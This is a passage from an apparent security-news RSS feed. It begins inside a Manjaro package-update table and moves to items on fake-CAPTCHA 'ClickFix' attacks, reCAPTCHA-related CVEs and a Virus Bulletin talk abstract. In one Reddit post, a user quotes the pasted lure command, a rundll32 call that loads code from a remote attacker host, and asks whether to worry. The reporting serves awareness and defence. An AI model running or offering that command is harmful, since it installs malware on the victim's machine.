                    syslog-ng-python             4.11.0-1             4.11.0-2
                     syslog-ng-redis             4.11.0-1             4.11.0-2
                      syslog-ng-smtp             4.11.0-1             4.11.0-2
                      syslog-ng-snmp             4.11.0-1             4.11.0-2
                       syslog-ng-sql             4.11.0-1             4.11.0-2
                             systing              1.0.0-1              1.0.0-2
                            taffybar             4.1.0-13             4.1.0-18
                      tamarin-prover            1.12.0-10            1.12.0-14
                     taskwarrior-tui             0.26.7-1             0.26.8-1
                     tauon-music-box              9.1.1-1              9.1.2-1
                    telegram-desktop              6.6.4-6              6.6.4-7
                          terragrunt             0.99.4-2             0.99.5-1
                              thunar             4.20.7-1             4.20.8-1
                         thunderbird              149.0-1            149.0.1-1
                 thunderbird-i18n-af              149.0-1            149.0.1-1
                 thunderbird-i18n-ar              149.0-1            149.0.1-1
                thunderbird-i18n-ast              149.0-1            149.0.1-1
                 thunderbird-i18n-be              149.0-1            149.0.1-1
                 thunderbird-i18n-bg              149.0-1            149.0.1-1
                 thunderbird-i18n-br              149.0-1            149.0.1-1
                 thunderbird-i18n-ca              149.0-1            149.0.1-1
                thunderbird-i18n-cak              149.0-1            149.0.1-1
                 thunderbird-i18n-cs              149.0-1            149.0.1-1
                 thunderbird-i18n-cy              149.0-1            149.0.1-1
                 thunderbird-i18n-da              149.0-1            149.0.1-1
                 thunderbird-i18n-de              149.0-1            149.0.1-1
                thunderbird-i18n-dsb              149.0-1            149.0.1-1
                 thunderbird-i18n-el              149.0-1            149.0.1-1
              thunderbird-i18n-en-gb              149.0-1            149.0.1-1
              thunderbird-i18n-en-us              149.0-1            149.0.1-1
              thunderbird-i18n-es-ar              149.0-1            149.0.1-1
              thunderbird-i18n-es-es              149.0-1            149.0.1-1
                 thunderbird-i18n-et              149.0-1            149.0.1-1
                 thunderbird-i18n-eu              149.0-1            149.0.1-1
                 thunderbird-i18n-fi              149.0-1            149.0.1-1
                 thunderbird-i18n-fr              149.0-1            149.0.1-1
              thunderbird-i18n-fy-nl              149.0-1            149.0.1-1
              thunderbird-i18n-ga-ie              149.0-1            149.0.1-1
                 thunderbird-i18n-gd              149.0-1            149.0.1-1
                 thunderbird-i18n-gl              149.0-1            149.0.1-1
                 thunderbird-i18n-he              149.0-1            149.0.1-1
                 thunderbird-i18n-hr              149.0-1            149.0.1-1
                thunderbird-i18n-hsb              149.0-1            149.0.1-1
                 thunderbird-i18n-hu              149.0-1            149.0.1-1
              thunderbird-i18n-hy-am              149.0-1            149.0.1-1
                 thunderbird-i18n-id              149.0-1            149.0.1-1
                 thunderbird-i18n-is              149.0-1            149.0.1-1
                 thunderbird-i18n-it              149.0-1            149.0.1-1
                 thunderbird-i18n-ja              149.0-1            149.0.1-1
                 thunderbird-i18n-ka              149.0-1            149.0.1-1
                thunderbird-i18n-kab              149.0-1            149.0.1-1
                 thunderbird-i18n-kk              149.0-1            149.0.1-1
                 thunderbird-i18n-ko              149.0-1            149.0.1-1
                 thunderbird-i18n-lt              149.0-1            149.0.1-1
                 thunderbird-i18n-ms              149.0-1            149.0.1-1
              thunderbird-i18n-nb-no              149.0-1            149.0.1-1
                 thunderbird-i18n-nl              149.0-1            149.0.1-1
              thunderbird-i18n-nn-no              149.0-1            149.0.1-1
              thunderbird-i18n-pa-in              149.0-1            149.0.1-1
                 thunderbird-i18n-pl              149.0-1            149.0.1-1
              thunderbird-i18n-pt-br              149.0-1            149.0.1-1
              thunderbird-i18n-pt-pt              149.0-1            149.0.1-1
                 thunderbird-i18n-rm              149.0-1            149.0.1-1
                 thunderbird-i18n-ro              149.0-1            149.0.1-1
                 thunderbird-i18n-ru              149.0-1            149.0.1-1
                 thunderbird-i18n-sk              149.0-1            149.0.1-1
                 thunderbird-i18n-sl              149.0-1            149.0.1-1
                 thunderbird-i18n-sq              149.0-1            149.0.1-1
                 thunderbird-i18n-sr              149.0-1            149.0.1-1
              thunderbird-i18n-sv-se              149.0-1            149.0.1-1
                 thunderbird-i18n-th              149.0-1            149.0.1-1
                 thunderbird-i18n-tr              149.0-1            149.0.1-1
                 thunderbird-i18n-uk              149.0-1            149.0.1-1
                 thunderbird-i18n-uz              149.0-1            149.0.1-1
                 thunderbird-i18n-vi              149.0-1            149.0.1-1
              thunderbird-i18n-zh-cn              149.0-1            149.0.1-1
              thunderbird-i18n-zh-tw              149.0-1            149.0.1-1
                         timescaledb             2.26.0-1             2.26.1-1
             timescaledb-old-upgrade             2.26.0-1             2.26.1-1
                       tokio-console             0.1.14-1             0.1.14-2
                             traefik             3.6.11-1             3.6.12-1
                                tree              2.3.1-1              2.3.2-1
                             udiskie              2.6.1-1              2.6.2-1
                         udisks2-qt5              5.0.6-2                    -
              ultramaster-kr106-clap              2.4.4-1            2.4.6.1-1
               ultramaster-kr106-lv2              2.4.4-1            2.4.6.1-1
              ultramaster-kr106-vst3              2.4.4-1            2.4.6.1-1
                               usage             2.18.2-1              3.2.0-1
                            usbguard              1.1.4-4              1.1.4-5
                                vala            0.56.18-5            0.56.19-1
                             vcspull             1.58.0-1             1.58.1-1
                    vhba-module-dkms          20250329-70          20250329-71
                                 vim           9.2.0204-2           9.2.0272-1
                         vim-runtime           9.2.0204-2           9.2.0272-1
                                 vis 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
             vis-syntax-highlighting 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
                                 vlc             3.0.22-1             3.0.22-2
                             vlc-cli             3.0.22-1             3.0.22-2
                     vlc-gui-ncurses             3.0.22-1             3.0.22-2
                          vlc-gui-qt             3.0.22-1             3.0.22-2
                      vlc-gui-skins2             3.0.22-1             3.0.22-2
                   vlc-plugin-a52dec             3.0.22-1             3.0.22-2
                    vlc-plugin-aalib             3.0.22-1             3.0.22-2
                     vlc-plugin-alsa             3.0.22-1             3.0.22-2
                      vlc-plugin-aom             3.0.22-1             3.0.22-2
                  vlc-plugin-archive             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb24             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb25             3.0.22-1             3.0.22-2
                      vlc-plugin-ass             3.0.22-1             3.0.22-2
                    vlc-plugin-avahi             3.0.22-1             3.0.22-2
                   vlc-plugin-bluray             3.0.22-1             3.0.22-2
                     vlc-plugin-caca             3.0.22-1             3.0.22-2
                     vlc-plugin-cddb             3.0.22-1             3.0.22-2
               vlc-plugin-chromecast             3.0.22-1             3.0.22-2
                    vlc-plugin-dav1d             3.0.22-1             3.0.22-2
                     vlc-plugin-dbus             3.0.22-1             3.0.22-2
         vlc-plugin-dbus-screensaver             3.0.22-1             3.0.22-2
                      vlc-plugin-dca             3.0.22-1             3.0.22-2
                      vlc-plugin-dvb             3.0.22-1             3.0.22-2
                      vlc-plugin-dvd             3.0.22-1             3.0.22-2
                    vlc-plugin-faad2             3.0.22-1             3.0.22-2
                   vlc-plugin-ffmpeg             3.0.22-1             3.0.22-2
                 vlc-plugin-firewire             3.0.22-1             3.0.22-2
                     vlc-plugin-flac             3.0.22-1             3.0.22-2
               vlc-plugin-fluidsynth             3.0.22-1             3.0.22-2
                 vlc-plugin-freetype             3.0.22-1             3.0.22-2
                      vlc-plugin-gme             3.0.22-1             3.0.22-2
                   vlc-plugin-gnutls             3.0.22-1             3.0.22-2
                vlc-plugin-gstreamer             3.0.22-1             3.0.22-2
                  vlc-plugin-inflate             3.0.22-1             3.0.22-2
                     vlc-plugin-jack             3.0.22-1             3.0.22-2
                  vlc-plugin-journal             3.0.22-1             3.0.22-2
                     vlc-plugin-jpeg             3.0.22-1             3.0.22-2
                     vlc-plugin-kate             3.0.22-1             3.0.22-2
                  vlc-plugin-kwallet             3.0.22-1             3.0.22-2
                vlc-plugin-libsecret             3.0.22-1             3.0.22-2
                     vlc-plugin-lirc             3.0.22-1             3.0.22-2
                  vlc-plugin-live555             3.0.22-1             3.0.22-2
                      vlc-plugin-lua             3.0.22-1             3.0.22-2
                      vlc-plugin-mad             3.0.22-1             3.0.22-2
                 vlc-plugin-matroska             3.0.22-1             3.0.22-2
                     vlc-plugin-mdns             3.0.22-1             3.0.22-2
                  vlc-plugin-modplug             3.0.22-1             3.0.22-2
                    vlc-plugin-mpeg2             3.0.22-1             3.0.22-2
                   vlc-plugin-mpg123             3.0.22-1             3.0.22-2
                      vlc-plugin-mtp             3.0.22-1             3.0.22-2
                 vlc-plugin-musepack             3.0.22-1             3.0.22-2
                      vlc-plugin-nfs             3.0.22-1             3.0.22-2
                   vlc-plugin-notify             3.0.22-1             3.0.22-2
                      vlc-plugin-ogg             3.0.22-1             3.0.22-2
                     vlc-plugin-opus             3.0.22-1             3.0.22-2
                      vlc-plugin-png             3.0.22-1             3.0.22-2
                    vlc-plugin-pulse             3.0.22-1             3.0.22-2
                vlc-plugin-quicksync             3.0.22-1             3.0.22-2
               vlc-plugin-samplerate             3.0.22-1             3.0.22-2
                      vlc-plugin-sdl             3.0.22-1             3.0.22-2
                     vlc-plugin-sftp             3.0.22-1             3.0.22-2
                    vlc-plugin-shout             3.0.22-1             3.0.22-2
                      vlc-plugin-smb             3.0.22-1             3.0.22-2
                     vlc-plugin-soxr             3.0.22-1             3.0.22-2
                    vlc-plugin-speex             3.0.22-1             3.0.22-2
                      vlc-plugin-srt             3.0.22-1             3.0.22-2
                      vlc-plugin-svg             3.0.22-1             3.0.22-2
                      vlc-plugin-tag             3.0.22-1             3.0.22-2
                   vlc-plugin-theora             3.0.22-1             3.0.22-2
                  vlc-plugin-twolame             3.0.22-1             3.0.22-2
                     vlc-plugin-udev             3.0.22-1             3.0.22-2
                     vlc-plugin-upnp             3.0.22-1             3.0.22-2
                   vlc-plugin-vorbis             3.0.22-1             3.0.22-2
                      vlc-plugin-vpx             3.0.22-1             3.0.22-2
                     vlc-plugin-x264             3.0.22-1             3.0.22-2
                     vlc-plugin-x265             3.0.22-1             3.0.22-2
                      vlc-plugin-xml             3.0.22-1             3.0.22-2
                     vlc-plugin-zvbi             3.0.22-1             3.0.22-2
                     vlc-plugins-all             3.0.22-1             3.0.22-2
                    vlc-plugins-base             3.0.22-1             3.0.22-2
                   vlc-plugins-extra             3.0.22-1             3.0.22-2
            vlc-plugins-video-output             3.0.22-1             3.0.22-2
           vlc-plugins-visualization             3.0.22-1             3.0.22-2
                              vmexec              0.4.0-1              0.5.2-1
                                vpnc  1:0.5.3.r539.r239-1  1:0.5.3.r557.r241-1
                         warzone2100              4.6.3-2              4.6.3-3
                           watchexec              2.5.0-1              2.5.1-1
             webrtc-audio-processing                2.1-5                2.1-6
                         wireplumber             0.5.13-2             0.5.14-1
                    wireplumber-docs             0.5.13-2             0.5.14-1
                       wireshark-cli              4.6.4-1              4.6.4-2
                        wireshark-qt              4.6.4-1              4.6.4-2
              xdg-desktop-portal-dde             1.0.13-7             1.0.14-1
                           xdp-tools              1.6.2-1              1.6.3-1
                           xfdesktop             4.20.1-3             4.20.2-1
                              xmobar             0.50-137             0.50-141
                              xmonad           0.18.0-154           0.18.0-156
                      xmonad-contrib           0.18.1-138           0.18.1-140
                         xmonad-dbus          0.1.0.2-240          0.1.0.2-243
                       xmonad-extras             0.17.3-6             0.17.3-9
                      xorg-setxkbmap              1.3.4-2              1.3.5-1
                                 xrt          1:2.21.75-5          1:2.21.75-6
                          xtrabackup            8.4.0_5-1            8.4.0_5-2
                                  z3             4.15.4-2             4.16.0-1
                             z3-java             4.15.4-2             4.16.0-1
                             zathura         2026.02.22-1         2026.03.27-1
                          zathura-cb         2026.02.03-3         2026.02.03-4
                        zathura-djvu         2026.02.03-3         2026.02.03-4
                   zathura-pdf-mupdf         2026.02.03-5         2026.02.03-6
                 zathura-pdf-poppler         2026.02.03-3         2026.02.03-4
                          zathura-ps         2026.02.03-3         2026.02.03-4
                              zettlr              4.3.0-1              4.3.1-1
                              zypper            1.14.95-1            1.14.95-2
                            ares-emu                    -                147-2
                             diffoci                    -              0.1.8-1
                         govulncheck                    -              1.1.4-1
                       libkysdk-base                    -            3.0.1.0-1
                         librashader                    -             0.10.1-2
                       python-podman                    -              5.8.0-2
                        python-pylxd                    -              2.4.0-2
                        python-ws4py                    -              0.6.0-4
                         udisks2-qt6                    -              6.0.1-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                         lib32-clang             22.1.1-1             22.1.2-1
              lib32-gst-plugins-base             1.28.1-2             1.28.1-3
         lib32-gst-plugins-base-libs             1.28.1-2             1.28.1-3
              lib32-gst-plugins-good             1.28.1-2             1.28.1-3
                     lib32-gstreamer             1.28.1-2             1.28.1-3
                        lib32-libvpx             1.15.2-2             1.16.0-2
                          lib32-llvm           1:22.1.1-1           1:22.1.2-1
                     lib32-llvm-libs           1:22.1.1-1           1:22.1.2-1
</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weird new type of Captcha?]]></title>
<description><![CDATA[I just got a new "I am not a robot" captcha when entering a website that I visit often (which has never asked me for a captcha in any way) that looks like the one where you select which images containt a certain object.  However this one is kind of different, it says the following: Complete these...]]></description>
<link>https://tsecurity.de/de/3371396/it-security-nachrichten/weird-new-type-of-captcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3371396/it-security-nachrichten/weird-new-type-of-captcha/</guid>
<pubDate>Mon, 23 Mar 2026 02:51:12 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I just got a new "I am not a robot" captcha when entering a website that I visit often (which has never asked me for a captcha in any way) that looks like the one where you select which images containt a certain object. </p> <p>However this one is kind of different, it says the following:</p> <p><code>Complete these Verification Steps</code></p> <p><code>To better prove you are not a robot, please:</code></p> <ol> <li><code>Press &amp; hold the Windows Key + R.</code></li> <li><code>In the verification window, press Ctrl + V.</code></li> <li><code>Press Enter on your keyboard to finish.</code></li> </ol> <p><code>You will observe and agree:</code><br> <code>"I am not a robot - reCAPTCHA Verification ID: 2753196"</code></p> <p>When I press windows+R and then Ctrl+V, the pasted command is the following:</p> <blockquote> <p>rundll32.exe \\83wi.snap-echo.in.net@80\verification.google,#1</p> </blockquote> <p>Should I worry?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/rogervendrell_"> /u/rogervendrell_ </a> <br> <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1s0t6f7/weird_new_type_of_captcha/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1s0t6f7/weird_new_type_of_captcha/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Defending Against ClickFix: Microsoft Security Experts in Action]]></title>
<description><![CDATA[Author: Microsoft Security - Bewertung: 1x - Views:16 It looked like an ordinary reCAPTCHA—but it was anything but. In this attack, users were unknowingly manipulated into copying malicious commands to their clipboard. With a simple paste and press of Enter, the user executed the attack themselve...]]></description>
<link>https://tsecurity.de/de/3311233/it-security-video/defending-against-clickfix-microsoft-security-experts-in-action/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3311233/it-security-video/defending-against-clickfix-microsoft-security-experts-in-action/</guid>
<pubDate>Thu, 26 Feb 2026 03:16:51 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Microsoft Security - Bewertung: 1x - Views:16 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/5gfqBPng6MU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>It looked like an ordinary reCAPTCHA—but it was anything but. In this attack, users were unknowingly manipulated into copying malicious commands to their clipboard. With a simple paste and press of Enter, the user executed the attack themselves—no exploit required.<br />
<br />
Instead of running commands directly, the adversary changed tactics: Why not get the user to do it for us?<br />
<br />
Microsoft Security Experts identified this ClickFix technique immediately and alerted the organization’s cybersecurity team.<br />
<br />
By layering expert intelligence across every stage of the security lifecycle, Microsoft Security Experts help organizations detect, defend against, and respond to evolving cyber threats—around the clock.<br />
<br />
Learn more: https://msft.it/6055Qw645<br />
<br />
#Microsoft #MicrosoftSecurity #MicrosoftSecurityExperts<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-8280 | Contact Form 7 reCAPTCHA Plugin up to 1.2.0 on WordPress REQUEST_URI cross site scripting]]></title>
<description><![CDATA[A vulnerability has been found in Contact Form 7 reCAPTCHA Plugin up to 1.2.0 on WordPress and classified as problematic. This impacts an unknown function. Performing a manipulation of the argument REQUEST_URI results in cross site scripting.

This vulnerability is cataloged as CVE-2025-8280. It ...]]></description>
<link>https://tsecurity.de/de/3286906/sicherheitsluecken/cve-2025-8280-contact-form-7-recaptcha-plugin-up-to-120-on-wordpress-requesturi-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3286906/sicherheitsluecken/cve-2025-8280-contact-form-7-recaptcha-plugin-up-to-120-on-wordpress-requesturi-cross-site-scripting/</guid>
<pubDate>Fri, 13 Feb 2026 17:52:46 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.contact_form_7_recaptcha_plugin">Contact Form 7 reCAPTCHA Plugin up to 1.2.0</a> on WordPress and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This impacts an unknown function. Performing a manipulation of the argument <em>REQUEST_URI</em> results in cross site scripting.

This vulnerability is cataloged as <a href="https://vuldb.com/?source_cve.323740">CVE-2025-8280</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Montag: Kurzschlaf in autonomen Fahrzeugen, Datenhoheit bei Googles reCAPTCHA]]></title>
<description><![CDATA[Fahrtüchtigkeit nach Kurzschlaf + Google wird DSGVO-konformer + Renault-Verkaufsverbot im Patentstreit + Rückblick auf Oculus VR + Kryptobörse mit Bitcoin-Panne]]></description>
<link>https://tsecurity.de/de/3276392/it-nachrichten/montag-kurzschlaf-in-autonomen-fahrzeugen-datenhoheit-bei-googles-recaptcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3276392/it-nachrichten/montag-kurzschlaf-in-autonomen-fahrzeugen-datenhoheit-bei-googles-recaptcha/</guid>
<pubDate>Mon, 09 Feb 2026 06:31:57 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fahrtüchtigkeit nach Kurzschlaf + Google wird DSGVO-konformer + Renault-Verkaufsverbot im Patentstreit + Rückblick auf Oculus VR + Kryptobörse mit Bitcoin-Panne]]></content:encoded>
</item>
<item>
<title><![CDATA[Schluss mit Datensammelwut: Google macht reCAPTCHA DSGVO-konformer]]></title>
<description><![CDATA[Durch den Wechsel zur Auftragsverarbeitung gibt Google die Datenhoheit an Webseitenbetreiber ab und reagiert auf wachsenden Regulierungsdruck im KI-Zeitalter.]]></description>
<link>https://tsecurity.de/de/3275495/it-nachrichten/schluss-mit-datensammelwut-google-macht-recaptcha-dsgvo-konformer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3275495/it-nachrichten/schluss-mit-datensammelwut-google-macht-recaptcha-dsgvo-konformer/</guid>
<pubDate>Sun, 08 Feb 2026 11:17:14 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Durch den Wechsel zur Auftragsverarbeitung gibt Google die Datenhoheit an Webseitenbetreiber ab und reagiert auf wachsenden Regulierungsdruck im KI-Zeitalter.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyber-Criminals Increasingly Using Official reCAPTCHA Walls in Phishing Attacks]]></title>
<description><![CDATA[Scammers using reCAPTCHA walls to fool analysis systems and trick users]]></description>
<link>https://tsecurity.de/de/3261686/it-security-nachrichten/cyber-criminals-increasingly-using-official-recaptcha-walls-in-phishing-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3261686/it-security-nachrichten/cyber-criminals-increasingly-using-official-recaptcha-walls-in-phishing-attacks/</guid>
<pubDate>Fri, 06 Feb 2026 13:13:56 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Scammers using reCAPTCHA walls to fool analysis systems and trick users]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-15005 | CouchCMS up to 2.4 reCAPTCHA couch/config.example.php K_RECAPTCHA_SITE_KEY/K_RECAPTCHA_SECRET_KEY hard-coded key (EUVD-2025-204679)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in CouchCMS up to 2.4. Affected is an unknown function of the file couch/config.example.php of the component reCAPTCHA Handler. The manipulation of the argument K_RECAPTCHA_SITE_KEY/K_RECAPTCHA_SECRET_KEY results in use of hard-coded...]]></description>
<link>https://tsecurity.de/de/3173085/sicherheitsluecken/cve-2025-15005-couchcms-up-to-24-recaptcha-couchconfigexamplephp-krecaptchasitekeykrecaptchasecretkey-hard-coded-key-euvd-2025-204679/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3173085/sicherheitsluecken/cve-2025-15005-couchcms-up-to-24-recaptcha-couchconfigexamplephp-krecaptchasitekeykrecaptchasecretkey-hard-coded-key-euvd-2025-204679/</guid>
<pubDate>Mon, 22 Dec 2025 03:35:59 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, was found in <a href="https://vuldb.com/?product.couchcms">CouchCMS up to 2.4</a>. Affected is an unknown function of the file <em>couch/config.example.php</em> of the component <em>reCAPTCHA Handler</em>. The manipulation of the argument <em>K_RECAPTCHA_SITE_KEY/K_RECAPTCHA_SECRET_KEY</em> results in use of hard-coded cryptographic key
.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.337711">CVE-2025-15005</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Generate QR Codes in Python]]></title>
<description><![CDATA[A beginner-friendly tutorial exploring the Python "qrcode" Package 
The post How to Generate QR Codes in Python appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3133202/ai-nachrichten/how-to-generate-qr-codes-in-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3133202/ai-nachrichten/how-to-generate-qr-codes-in-python/</guid>
<pubDate>Tue, 02 Dec 2025 13:32:09 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A beginner-friendly tutorial exploring the Python "qrcode" Package </p>
<p>The post <a href="https://towardsdatascience.com/how-to-generate-qr-code-in-python/">How to Generate QR Codes in Python</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[You definitely don’t want to CopyPaste this: FakeCaptcha ecosystem — Dmitrij Lenz & Roberto DaSilva]]></title>
<description><![CDATA[Author: Virus Bulletin - Bewertung: 0x - Views:1 You definitely don't want to CopyPaste this: FakeCaptcha ecosystem

Presented at the VB2025 conference in Berlin, 24 - 26 September 2025.
↓ Slides: N/A
↓ Paper: https://www.virusbulletin.com/uploads/pdf/conference/vb2025/papers/You-definitely-dont-...]]></description>
<link>https://tsecurity.de/de/3115931/it-security-video/you-definitely-dont-want-to-copypaste-this-fakecaptcha-ecosystem-dmitrij-lenz-roberto-dasilva/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3115931/it-security-video/you-definitely-dont-want-to-copypaste-this-fakecaptcha-ecosystem-dmitrij-lenz-roberto-dasilva/</guid>
<pubDate>Mon, 24 Nov 2025 01:02:30 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/fMF2cwDc0uM/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: Virus Bulletin - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/fMF2cwDc0uM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>You definitely don't want to CopyPaste this: FakeCaptcha ecosystem<br />
<br />
Presented at the VB2025 conference in Berlin, 24 - 26 September 2025.<br />
↓ Slides: N/A<br />
↓ Paper: https://www.virusbulletin.com/uploads/pdf/conference/vb2025/papers/You-definitely-dont-want-to-CopyPaste-this-FakeCaptcha-ecosystem.pdf<br />
→ Details: https://www.virusbulletin.com/conference/vb2025/abstracts/you-definitely-dont-want-copypaste-fakecaptcha-ecosystem/<br />
<br />
✪ PRESENTED BY ✪<br />
<br />
• Dmitrij Lenz (Google) <br />
• Roberto Dasilva (Google)<br />
<br />
✪ ABSTRACT ✪<br />
<br />
Social engineering has historically been an integral part of many infection chains. Different techniques emerge within the field of social engineering, with some achieving widespread usage. This was observed with the "FakeCaptcha/FixIt" TTP during the latter half of 2024. "FakeCaptcha/FixIt" attacks involve tricking victims into copying commands from malicious websites or emails and then executing them in their command-line interface.<br />
<br />
The TTP was so effective that multiple threat actors began to sell builders for these landing pages, with services tailored to different delivery mechanisms (e.g. email spam, malvertising). Simultaneously, several distinct internal implementations were discovered, each connected to a specific threat cluster. Finally, some actors utilize a drive-by distribution method and adopt only the narrative, while others combine the technique with other methods, such as FakeUpdate.<br />
<br />
Although attacks might appear identical from the user's point of view, the exact implementations are different. This presentation details each implementation including their infrastructure, observed stages, final payloads, and a service component if such exists. Additionally, given that most kits underwent continuous development throughout 2024 and 2025, we will illustrate how some implementations have evolved over time. Our pipelines enable reliable collection of malware that is distributed by FakeCaptcha, providing a statistical overview of the ecosystem and its players. We will also see how more espionage-oriented actors are embracing the same technique. Espionage kits are often built from readily available components found in crime FakeCaptcha kits, with the addition of more advanced cloaking mechanisms.<br />
<br />
Finally, we will examine the factors that make this technique effective, such as diminished value of PS-Execution policy and resonating comments like "I am not a robot - reCAPTCHA Verification ID" after the command. Some shared attributes among various implementations will be highlighted to help with monitoring and prevention.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New ClickFix Campaign “EVALUSION” Deploys Amatera Stealer and NetSupport RAT]]></title>
<description><![CDATA[New ClickFix Campaign “EVALUSION” Deploys Amatera Stealer and NetSupport RAT
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 1
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
				
				
				
				
				
				...]]></description>
<link>https://tsecurity.de/de/3104192/it-security-nachrichten/new-clickfix-campaign-evalusion-deploys-amatera-stealer-and-netsupport-rat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3104192/it-security-nachrichten/new-clickfix-campaign-evalusion-deploys-amatera-stealer-and-netsupport-rat/</guid>
<pubDate>Tue, 18 Nov 2025 11:20:14 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">New ClickFix Campaign “EVALUSION” Deploys Amatera Stealer and NetSupport RAT</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-286699 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">1</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
